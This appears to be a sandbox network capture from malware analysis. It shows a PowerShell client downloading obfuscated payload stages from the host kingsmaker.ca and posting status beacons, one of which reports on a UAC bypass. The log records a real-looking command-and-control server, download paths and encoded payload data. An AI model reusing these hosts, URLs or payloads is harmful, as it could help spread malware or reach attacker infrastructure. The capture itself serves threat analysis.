2024-11-29 08:09:01 UTC	260	IN	Data Raw: 25 76 71 71 72 76 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 55 4b 60 63 54 5b 73 55 6d 53 43 4c 54 34 54 60 7b 4b 60 57 47 57 34 55 56 30 4a 60 31 34 44 56 55 43 5b 57 47 54 30 56 56 71 52 60 54 34 70 56 6c 30 60 60 6d 6a 31 56 55 4b 4b 4c 57 6d 75 55 55 4f 5b 57 46 53 6e 56 6a 65 4f 4c 6d 6d 37 52 6c 75 60 53 30 54 7b 55 30 65 47 4c 57 71 54 53 59 69 4f 64 6a 6d 37 56 6a 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 5b 44 69 4a 4f 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 Data Ascii: %vqqrv<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#WUK`cT[sUmSCLT4T`{K`WGW4UV0J`14DVUC[WGT0VVqR`T4pVl0``mj1VUKKLWmuUUO[WFSnVjeOLmm7Rlu`S0T{U0eGLWqTSYiOdjm7VjOKO1SSc3eKP1Go[DiJOTSSc3eKP1GoRTOC[1mHb14E`TGoRTOC[1mEPVeKP1GoRTOR
2024-11-29 08:09:01 UTC	1369	IN	Data Raw: 6b 57 4b 53 45 43 6f 52 6a 65 35 65 6d 6e 76 4c 56 79 6b 4c 31 34 6e 56 6b 4b 56 64 6a 6d 48 65 33 65 53 4c 6b 6d 30 5b 46 30 56 64 56 53 46 54 6f 5b 4c 57 59 43 37 58 6b 48 31 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 4a 58 6c 34 60 65 6c 44 78 57 59 53 56 4c 6d 5b 71 57 56 30 56 64 46 53 59 57 6f 71 6a 50 31 47 31 57 6d 69 4a 62 44 6d 45 54 6b 47 6b 63 56 75 6f 55 47 54 79 63 46 53 49 60 49 5b 60 50 31 4b 53 58 6b 4f 4e 4c 44 6d 45 4c 54 6d 60 57 31 5b 73 56 6d 69 4a 64 6a 6d 45 54 6c 38 60 57 31 5b 73 56 6d 69 4a 64 6a 6d 45 4c 54 4f 68 4c 6d 48 30 52 54 4f 52 60 56 48 78 54 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 56 55 4b 46 4c 47 6a 78 Data Ascii: kWKSECoRje5emnvLVykL14nVkKVdjmHe3eSLkm0[F0VdVSFTo[LWYC7XkH1O1SSc3eKP1GoRTOC[1mEPVeKP1KJXl4`elDxWYSVLm[qWV0VdFSYWoqjP1G1WmiJbDmETkGkcVuoUGTycFSI`I[`P1KSXkONLDmELTm`W1[sVmiJdjmETl8`W1[sVmiJdjmELTOhLmH0RTOR`VHxTkWDTV8oRTOC[1mEPVeKRECNP3mC[1mEPVeKP1GoVUKFLGjx
2024-11-29 08:09:01 UTC	1225	IN	Data Raw: 54 53 6c 6d 4f 64 6c 53 71 56 56 30 47 4c 57 71 54 54 6c 30 4f 53 44 54 76 55 6d 53 6e 63 44 30 54 53 59 65 4f 4c 6d 54 7b 55 6b 4b 57 65 31 38 59 53 55 43 4e 57 31 31 31 56 59 71 73 64 6a 34 44 50 59 69 5b 4c 6d 6d 34 56 56 30 5b 4c 44 34 54 52 6c 71 4e 63 57 6a 7b 55 54 65 4a 60 6d 6d 54 53 55 47 4e 57 31 6a 31 56 6d 65 5b 64 6a 38 59 55 59 65 4f 60 6a 47 34 56 6d 53 6b 64 57 6a 78 57 55 47 5b 64 6d 5b 75 55 6a 53 43 4f 44 30 37 56 55 4f 4f 4c 6a 57 32 56 56 71 57 64 6a 38 44 56 6c 30 60 63 57 47 35 55 59 71 72 60 6a 35 78 54 55 43 4f 63 57 6d 34 56 6d 65 47 64 54 30 44 50 55 47 5b 63 57 54 31 55 6d 53 47 4c 6d 71 70 57 6c 69 60 53 46 65 34 55 30 65 5b 4f 54 34 49 53 6c 6d 60 57 31 5b 71 55 31 65 5b 4c 30 71 75 57 59 71 4f 63 54 71 6e 55 54 53 4a 60 54 Data Ascii: TSlmOdlSqVV0GLWqTTl0OSDTvUmSncD0TSYeOLmT{UkKWe18YSUCNW111VYqsdj4DPYi[Lmm4VV0[LD4TRlqNcWj{UTeJ`mmTSUGNW1j1Vme[dj8YUYeO`jG4VmSkdWjxWUG[dm[uUjSCOD07VUOOLjW2VVqWdj8DVl0`cWG5UYqr`j5xTUCOcWm4VmeGdT0DPUG[cWT1UmSGLmqpWli`SFe4U0e[OT4ISlm`W1[qU1e[L0quWYqOcTqnUTSJ`T

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:02 UTC	364	OUT	GET /file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca
2024-11-29 08:09:03 UTC	1110	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:03 GMT Content-Type: application/octet-stream Content-Length: 21700 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PS%2BJFux4Fx87ROusB5NI2ddPzeFhfKte5MbRD8QXb6WnM0BLlzV4hG1y0Wop25c2Eg%2FGrSgZhkEkaquoGaX8Ml7heSt%2BrJoiGGxpc9HzN6PuS4dCNnSZGSWL1MDv6udyE6V%2FSQ0bIzA1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25277&min_rtt=1072&rtt_var=28046&sent=72&recv=84&lost=0&retrans=0&sent_bytes=26116&recv_bytes=49159&delivery_rate=3762886&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d01d8f10ad3-LAS server-timing: cfL4;desc="?proto=TCP&rtt=159032&min_rtt=158976&rtt_var=33622&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24068&cwnd=252&unsent_bytes=0&cid=018a00adaa57af67&ts=692&x=0"
2024-11-29 08:09:03 UTC	259	IN	Data Raw: 25 60 6c 6a 70 7b 78 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 60 6c 53 49 63 49 5b 68 60 54 4b 45 54 30 57 56 50 30 65 73 62 44 65 57 4c 54 71 4b 53 47 47 76 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 6e 63 47 6d 59 54 6c 79 6b 63 6a 30 6f 54 47 4f 42 50 56 54 7b 4c 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 65 46 79 6d 54 31 44 34 52 54 4f 4a 53 46 48 78 4f 55 43 60 57 7b 54 76 55 47 5b 52 4f 56 4f 49 57 56 6d 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 4b 5b 57 32 66 79 56 6d 4f 43 4e 54 6d 45 52 6c 69 6b 52 44 4b 7b 58 57 65 4e 60 46 53 49 63 49 5b 68 60 55 6d Data Ascii: %`ljp{x<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#`lSIcI[h`TKET0WVP0esbDeWLTqKSGGvO1SSc3eKP1GoRjencGmYTlykcj0oTGOBPVT{LEeDTV8oRTOC[1qIeFymT1D4RTOJSFHxOUC`W{TvUG[ROVOIWVmQe{CMRTOC[1mETkK[W2fyVmOCNTmERlikRDK{XWeN`FSIcI[h`Um
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 34 65 54 6d 70 62 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6c 38 60 57 31 5b 73 56 6d 69 4a 64 6d 65 34 54 6f 4b 60 56 46 79 6a 52 54 50 76 5b 31 71 48 56 6c 69 68 52 47 5b 72 55 32 62 76 52 31 6d 45 50 56 65 4b 50 30 48 79 58 33 30 73 5b 30 43 55 50 56 6d 69 52 47 48 76 58 31 69 4f 4f 6a 79 34 4e 59 4b 69 57 7b 57 74 58 7b 48 79 60 46 44 78 57 6f 6d 4c 63 54 34 6e 55 49 71 52 60 6d 6d 75 54 55 4b 4f 64 6c 53 6e 55 57 53 6e 60 6d 6d 54 58 7b 4f 4f 53 46 69 72 55 31 53 4f 64 47 6d 59 53 59 65 51 53 31 5b 71 55 57 53 42 60 44 30 54 54 59 65 60 57 47 47 32 55 55 4b 57 4c 6d 71 75 53 6c 75 4e 57 44 44 79 55 6d 53 73 4c 6d 71 54 57 59 6d 4f 63 54 71 73 55 6a 53 5b 4c 47 6d 54 57 55 57 5b 60 6d 4b 71 55 6c 71 60 60 6a 30 44 56 59 65 60 57 30 6a 79 56 57 Data Ascii: 4eTmpb14E[{CMRTOC[1mETl8`W1[sVmiJdme4ToK`VFyjRTPv[1qHVlihRG[rU2bvR1mEPVeKP0HyX30s[0CUPVmiRGHvX1iOOjy4NYKiW{WtX{Hy`FDxWomLcT4nUIqR`mmuTUKOdlSnUWSn`mmTX{OOSFirU1SOdGmYSYeQS1[qUWSB`D0TTYe`WGG2UUKWLmquSluNWDDyUmSsLmqTWYmOcTqsUjS[LGmTWUW[`mKqUlq``j0DVYe`W0jyVW
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 4c 47 71 60 57 6d 57 4a 56 57 47 57 56 6a 65 4c 63 59 69 72 58 6c 30 6a 4c 46 47 45 50 59 53 60 4c 30 47 6f 55 57 4f 73 55 6a 4f 71 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 45 4f 4a 62 46 53 49 57 59 53 69 53 7b 6d 37 5b 44 4f 43 60 56 4c 78 57 6f 57 60 50 31 4b 7b 58 6b 4b 6b 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 47 52 6a 71 52 57 54 71 69 54 33 75 60 57 47 57 73 5b 7b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 4c 31 71 76 5b 44 65 57 65 46 47 49 4e 59 71 6a 50 31 47 71 56 55 4b 35 63 47 6d 58 52 56 65 68 53 7b 6d 74 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 30 6e 78 64 49 5b 5b 63 54 5b 7b 55 33 75 6a 54 47 4b 72 63 47 5b 53 63 46 69 42 54 6c 75 5b 5b 30 43 55 50 6a 47 Data Ascii: LGq`WmWJVWGWVjeLcYirXl0jLFGEPYS`L0GoUWOsUjOqPVeKP1H2SGGw[1mEPVeKP1Go[EOJbFSIWYSiS{m7[DOC`VLxWoW`P1K{XkKk`T82LDuKP1GoRTOC[1mGRjqRWTqiT3u`WGWs[{eDTV8oRTOC[1mEPVejL1qv[DeWeFGINYqjP1GqVUK5cGmXRVehS{mtRVq{UjOqPVeKP1GoRTOC`0nxdI[[cT[{U3ujTGKrcG[ScFiBTlu[[0CUPjG
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 31 53 53 63 33 65 4b 50 31 47 6f 57 6b 43 35 54 6d 65 57 63 47 4b 55 60 32 43 51 57 6f 6d 43 60 57 47 75 57 6c 34 69 57 7b 53 6f 54 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 65 56 4f 46 47 58 55 6b 43 6b 65 7b 43 4d 52 54 4f 43 5b 31 6d 49 63 46 30 4b 50 33 65 31 58 6c 31 34 4c 44 6d 45 60 47 57 60 56 44 35 76 55 47 5b 42 60 46 53 49 5b 33 65 4c 57 6a 4b 6e 5b 44 65 6f 5b 31 71 49 56 6f 43 68 53 30 5b 53 56 57 69 52 63 31 75 55 60 33 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 58 57 44 5b 46 56 6d 4f 56 53 6a 75 55 60 7b 57 58 52 54 4f 4a Data Ascii: 1SSc3eKP1GoWkC5TmeWcGKU`2CQWomC`WGuWl4iW{SoTjb4L3KudI[[W0GoRje`bFKIWmG[VGKwRVq{UjOqPVeKP1GpRTWNc0qYUoKKS3yuRTiRc0qUPl0iW2irRTeVOFGXUkCke{CMRTOC[1mIcF0KP3e1Xl14LDmE`GW`VD5vUG[B`FSI[3eLWjKn[Deo[1qIVoChS0[SVWiRc1uU`3eme{CMRTOC[1mEPVeKP1KXWD[FVmOVSjuU`{WXRTOJ
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 71 33 58 6d 5b 56 64 56 4b 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 6f 52 31 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 57 6c 4f 75 65 32 4f 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4a 53 57 4b 72 58 7b 4f 52 62 46 4b 75 53 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4d 54 55 43 4d 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 31 34 33 5b 47 62 30 4c 44 6d 44 4c 46 65 4f 57 44 44 32 53 47 47 77 5b 31 6d 45 50 56 65 6a 4c 6c 69 76 58 6a 65 57 63 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 4c 79 63 6c 53 45 50 59 65 4d 54 55 43 4d 52 54 4f 43 5b 31 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 52 Data Ascii: q3Xm[VdVKEPkeDTV8oRTOC[3OISom[W{CoR1DvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORWlOue2ODTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJSWKrX{ORbFKuSkCiW{m0SGGw[1mEPVeMTUCMSGGw[1mEPVeJS143[Gb0LDmDLFeOWDD2SGGw[1mEPVejLlivXjeWc1qIUo[jW{TvRTLyclSEPYeMTUCMRTOC[1mHb14E`TGoRTOC[1mEPVejR
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6d 4f 60 57 31 5b 73 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 65 72 65 56 53 49 4e 46 65 5b 54 31 4b 71 5b 57 69 52 63 44 6d 49 53 6f 6d 6b 63 54 58 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4f 5b 30 43 55 50 6c 4b 57 4c 33 79 37 5b 44 65 56 65 44 79 73 63 47 43 4c 60 30 71 76 58 6a 65 56 5b 44 38 70 62 47 4f 60 57 31 5b 73 54 57 65 35 62 30 47 74 63 45 43 60 56 44 30 77 52 6a 57 72 65 56 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 32 43 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 59 6d 42 50 6c 4f 48 50 6f 4f 6d 54 31 4b 5b 57 45 47 4b 5b 30 71 59 4f 56 71 6b 63 6c 79 32 5b 44 65 72 65 6c Data Ascii: qPVeKP1GoRTOC[1m4PmO`W1[sRTiRc0qUPl0iW2irRTereVSINFe[T1Kq[WiRcDmISomkcTX0SGGw[1mEPVeKP1GoRTORcVGYdFySclvvVmiO[0CUPlKWL3y7[DeVeDyscGCL`0qvXjeV[D8pbGO`W1[sTWe5b0GtcEC`VD0wRjWreVOHWkCRcVy{Vm[B`FSI[2CDTV8NP3mC[1mEPVeKP1GoRYmBPlOHPoOmT1K[WEGK[0qYOVqkcly2[Derel
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 58 6c 34 52 5b 44 71 46 54 6f 43 68 57 30 5b 33 5b 47 69 52 57 47 71 59 55 6f 5b 68 63 57 4b 37 52 54 50 76 5b 31 34 70 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 53 47 47 77 5b 31 6d 45 50 56 65 4d 54 55 43 4d 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 73 5b 44 65 56 65 46 4f 47 56 6f 5b 68 53 30 4b 72 58 33 6d 43 4e 54 6d 46 65 47 53 6d 56 44 35 76 56 6d 62 76 65 57 4f 57 4e 49 57 57 53 31 58 76 58 54 58 76 4f 6a 38 73 5b 46 79 6a 53 6d 4b 72 58 6d 69 42 54 57 6d 58 54 6c 38 4d 50 33 75 4e 50 33 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 54 50 76 5b 30 4f 75 4e 59 43 68 60 55 47 53 56 57 69 52 63 31 6d 45 4c 57 47 5b 56 47 4b 77 52 54 4f 52 4c 47 71 59 4c 59 65 52 63 55 6d Data Ascii: Xl4R[DqFToChW0[3[GiRWGqYUo[hcWK7RTPv[14pPVeKP1GoRTOC[1mEPVeKP1GoSGGw[1mEPVeMTUCMSGGwUjOqPVeKP1Gs[DeVeFOGVo[hS0KrX3mCNTmFeGSmVD5vVmbveWOWNIWWS1XvXTXvOj8s[FyjSmKrXmiBTWmXTl8MP3uNP3bvR1SSc3eKP1GoRje`bFKIWmG[VGKwRTPv[0OuNYCh`UGSVWiRc1mELWG[VGKwRTORLGqYLYeRcUm
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 47 4b 55 60 32 43 51 57 6f 6d 43 60 57 4b 75 63 49 4f 60 54 31 4b 72 5b 54 65 72 64 6c 53 48 55 55 5b 4b 50 30 4b 75 58 57 65 35 63 47 57 49 53 6b 43 69 50 31 6d 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 47 56 6d 65 35 63 46 53 49 57 56 65 6a 53 33 69 72 52 54 65 60 62 46 4b 49 57 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 4a 63 46 4b 59 4e 55 4b 60 54 7b 47 4a 5b 44 65 56 65 44 6d 45 4c 57 47 5b 56 47 4b 77 52 54 4f 52 63 56 47 59 64 46 79 57 53 31 58 76 58 54 4f 43 65 47 4b 75 4e 59 6d 5b 4c 6d 57 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 5b 44 30 57 57 6c 79 4a 57 57 57 76 52 30 53 72 58 33 65 4b 60 30 71 76 58 6a 65 57 5b 30 71 49 Data Ascii: GKU`2CQWomC`WKucIO`T1Kr[TerdlSHUU[KP0KuXWe5cGWISkCiP1mNP3bvR1mEPVeKP1GoRTOC[1mEPVeKdTKGVme5cFSIWVejS3irRTe`bFKIWT4E`TGoRTOC[1mEPVeKP1GoRT[JcFKYNUK`T{GJ[DeVeDmELWG[VGKwRTORcVGYdFyWS1XvXTOCeGKuNYm[LmWNP3mC[1mEPVeKP1GoRTOC[1mF[D0WWlyJWWWvR0SrX3eK`0qvXjeW[0qI
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 69 6f 5b 33 47 58 55 56 65 68 63 55 6a 76 52 54 65 35 65 6d 6a 78 65 46 79 60 50 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 31 5b 30 5b 44 65 72 4c 6c 47 58 52 6b 47 6a 50 31 44 34 52 54 57 6a 63 46 53 45 4c 57 69 68 57 33 79 50 56 56 30 76 63 47 6a 7b 54 56 65 4c 57 55 57 6e 58 6d 65 56 64 6c 4f 49 53 6c 71 60 54 31 47 71 58 33 31 34 65 6c 53 46 64 47 53 60 57 31 35 79 58 33 30 72 4c 46 57 57 55 6c 79 68 63 6d 4b 72 58 33 71 4b 60 54 6d 45 4c 57 4b 6a 57 30 5b 34 5b 57 4f 43 60 57 54 76 57 6a 30 52 57 54 34 57 52 54 4f 77 5b 30 4b 72 52 6d 43 54 54 31 4b 42 58 6c 34 52 62 46 53 75 63 49 6d 6a 56 44 34 53 58 33 31 34 60 33 53 59 55 6b 43 4b 5b 7b 43 4d 52 54 4f 43 5b 31 6d 46 5b 44 30 57 57 6c 79 4a 57 57 57 76 52 30 53 72 58 33 65 4b 60 31 5b 59 52 Data Ascii: io[3GXUVehcUjvRTe5emjxeFy`P1j2SGGw[1mEPVeJS1[0[DerLlGXRkGjP1D4RTWjcFSELWihW3yPVV0vcGj{TVeLWUWnXmeVdlOISlq`T1GqX314elSFdGS`W15yX30rLFWWUlyhcmKrX3qK`TmELWKjW0[4[WOC`WTvWj0RWT4WRTOw[0KrRmCTT1KBXl4RbFSucImjVD4SX314`3SYUkCK[{CMRTOC[1mF[D0WWlyJWWWvR0SrX3eK`1[YR
2024-11-29 08:09:03 UTC	1369	IN	Data Raw: 53 57 54 6d 35 54 57 57 6e 52 6d 47 59 53 6d 4b 53 57 33 53 42 54 6a 53 42 50 6d 4f 57 53 6a 4b 69 57 54 5b 48 56 6b 43 46 60 30 47 57 52 59 65 53 57 56 69 42 54 57 65 4e 4c 30 47 54 56 6a 4b 53 64 6c 69 42 57 44 69 6a 50 33 4f 73 53 6a 69 69 4c 44 5b 71 56 6b 43 4a 65 57 47 57 60 44 34 53 57 31 71 52 54 56 30 6e 50 6d 48 7b 55 6a 4b 59 63 44 5b 45 5b 57 57 46 53 44 34 47 53 6d 71 6a 4c 44 71 77 54 57 57 4f 4f 47 47 56 62 46 34 53 63 6a 4b 42 54 6b 4f 6a 50 6d 65 72 53 6a 4b 6d 57 54 5b 44 55 31 57 46 54 47 57 57 52 6c 38 53 57 56 53 56 54 57 5b 72 54 6d 47 54 54 6a 4b 52 4c 46 79 42 57 33 30 6a 50 6a 34 47 53 6a 57 54 57 54 5b 4e 5b 45 43 4a 62 57 47 57 54 6c 34 53 57 55 54 7b 54 57 53 4e 50 6d 4b 47 53 6a 4b 54 4c 54 5b 42 55 57 57 46 53 56 44 76 53 6c Data Ascii: SWTm5TWWnRmGYSmKSW3SBTjSBPmOWSjKiWT[HVkCF`0GWRYeSWViBTWeNL0GTVjKSdliBWDijP3OsSjiiLD[qVkCJeWGW`D4SW1qRTV0nPmH{UjKYcD[E[WWFSD4GSmqjLDqwTWWOOGGVbF4ScjKBTkOjPmerSjKmWT[DU1WFTGWWRl8SWVSVTW[rTmGTTjKRLFyBW30jPj4GSjWTWT[N[ECJbWGWTl4SWUT{TWSNPmKGSjKTLT[BUWWFSVDvSl

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:04 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 85
2024-11-29 08:09:04 UTC	85	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
2024-11-29 08:09:05 UTC	982	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:05 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Msb2ShuWT4XXmCW9Rqe%2FFjX2%2BlVRn3t40izBDp06Gq4MeVLeKtQK%2BYzt7Lbdx8ZG7Tkyd7KvXDpdajK5z3KTumXlvcuEtqYsAt%2Bh5Vg%2FwUPv67RKA%2BHMKI1Gc94CrJCe3vTtINsrh%2B0d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1180&min_rtt=1180&rtt_var=590&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=870&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d0d18c1a982-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158944&min_rtt=158834&rtt_var=33675&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1028&delivery_rate=24063&cwnd=252&unsent_bytes=0&cid=f9b2e9ad3d9dd240&ts=737&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:06 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 62
2024-11-29 08:09:06 UTC	62	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
2024-11-29 08:09:07 UTC	995	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:07 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ain8WcSWUbEqDeyuE2saGIF4HzxxwlTO49kaYHxuvTMx3H3QRN7XIV8cRLG4PV0EB4PcUKkMw%2B48Yei5%2BRSOwJgZCtM%2Fu56f%2F6qNtLWXtc%2B1gMMHiiUKhSTDqNKFMHfxkLLagz6ZSaE4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15166&min_rtt=1293&rtt_var=22482&sent=27&recv=24&lost=0&retrans=0&sent_bytes=24879&recv_bytes=5015&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d1ab92fa982-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158763&min_rtt=158662&rtt_var=33628&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1005&delivery_rate=24092&cwnd=252&unsent_bytes=0&cid=5dc7bf0be91ba35c&ts=664&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:06 UTC	388	OUT	GET /file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Connection: Keep-Alive
